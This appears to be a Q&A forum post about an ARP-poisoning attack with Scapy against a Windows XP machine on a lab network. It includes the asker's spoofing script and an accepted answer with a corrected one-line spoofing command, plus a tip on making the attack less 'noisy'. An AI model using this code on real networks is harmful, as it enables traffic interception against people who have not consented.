# Scapy arp poisoning not working for me

Tags: python, scapy

I am attacking a Windows XP machine with Backtrack 5 using scapy.

Now that's my code:

```
#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)
```

The code above actually sends two packets for some reason. One time my backtrack mac is asking:

> who has 192.168.0.106 *(Victim's IP)*? Tell 192.168.0.108 *(Backtrack's
>   IP - NOT SUPPOSED TO BE!)*.

Then he gets the "is at" answer from the victim.

And the second time my backtrack's mac is asking:

> who has 192.168.0.106 *(Victim's IP)*? Tell 192.168.0.1 *(The router's
>   IP).*

Then he gets the "is at" answer from the victim again.

**Then the victim's ARP table has to lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP.**

Why is this happenning?

Answer (score 1, accepted):

The first `ARP` packet you see comes from Scapy, because it wants to fill the `Ether` frame with the Victim's MAC address before `send()`-ing your `ARP` packet.

If you don't want that to happen, try (`sendp` sends at layer 2):

```
>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))
```

You can replace `ETHER_BROADCAST` with your victim's MAC address, that's less "noisy".